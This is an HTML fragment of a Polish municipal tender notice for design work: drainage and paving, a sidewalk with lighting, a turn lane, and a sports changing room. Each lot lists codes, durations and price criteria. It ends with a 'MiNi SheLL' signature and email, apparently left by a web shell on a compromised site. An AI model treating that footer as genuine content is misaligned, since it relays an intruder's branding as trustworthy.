<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.40.00-4, 71.33.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> GRUPA II.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA II:
Zadanie 1: ul. J. Piłsudskiego 32-38  ( część działki 537/74 o pow. ok. 630 m2- w ramach opracowania utwardzenie terenu, wykonanie zjazdu w ul. Piłsudskiego (dz. Nr 542) i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Piłsudskiego)
Zadanie 2: ul. J. Piłsudskiego 30 ( część działki 537/74 o pow. ok. 326 m2- w ramach opracowania utwardzenie terenu i odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Piłsudskiego)
Zadanie 3: ul. J. Piłsudskiego 57 ( część działki 546/18 o pow. ok. 99 m2- w ramach opracowania utwardzenie terenu i przebudowa odprowadzenie wód opadowych do kanalizacji deszczowej w ul. Łąki Zamkowe-Słowackiego).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.40.00-4, 71.33.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 9.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> GRUPA III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA III:
Zadanie 1: Budowa chodnika wraz z oświetleniem w miejscowości Rozłogi 
obejmujące m.in.:
- projekt chodnika na części działki nr 22/5, nr 22/6, nr22/1 przy drodze gminnej dz. Nr 136 szer 1,5 m i dł. ok.255  ,
- projekt oświetlenia drogowego,
-odwodnienie pasa drogowego.
Zadanie 2: Budowa dodatkowego pasa ruchu dla prawoskrętu na skrzyżowaniu ul. Osiedlowej z ul. Sulechowską w Świebodzinie  obejmujące m.in.:
- projekt dodatkowego pasa ruchu dla prawoskrętu na ul. Osiedlowej przed skrzyżowaniem z ul. Sulechowską na dł. ok. 35m , chodnik szer. ok. 1,5 m  (działka 348/1, 796/20, część działki 353/1 - droga powiatowa)    ,
- projekt przebudowy kanalizacji deszczowej - przesunięcie wpustów ulicznych kanalizacji deszczowej,
Czas trwania Zadania 1 - 5 miesięcy, Czas trwania Zadania 2 - 6 miesięcy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.40.00-4, 71.33.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> GRUPA IV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> GRUPA IV: Zadanie 1: Budowa szatni sportowej w miejscowości Jordanowo
(o pow. zabudowy ok. 132 m2)
obejmujące m.in.:
- inwentaryzację i ocenę stanu technicznego istniejącego budynku,
- szatnie dla dwóch druzyn piłki noznej z sanitariatami, pomieszczenie dla 3 sędziów z sanitariatami, magazyn,
- instalacje elektryczne ( szafka przyłączeniowa istniejąca przy budynku), 
- instalacje wod-kan,
- przyłącze wody z istniejącej studni głębinowej z analizą jej wydajności i przydatności do celów sanitarnych i podlewania murawy,
- zbiornik bezodpływowy o poj. do 10 m3 z odprowadzeniem do niego ścieków..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7, 71.35.40.00-4, 71.33.20.00-4, 71.24.20.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 5.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com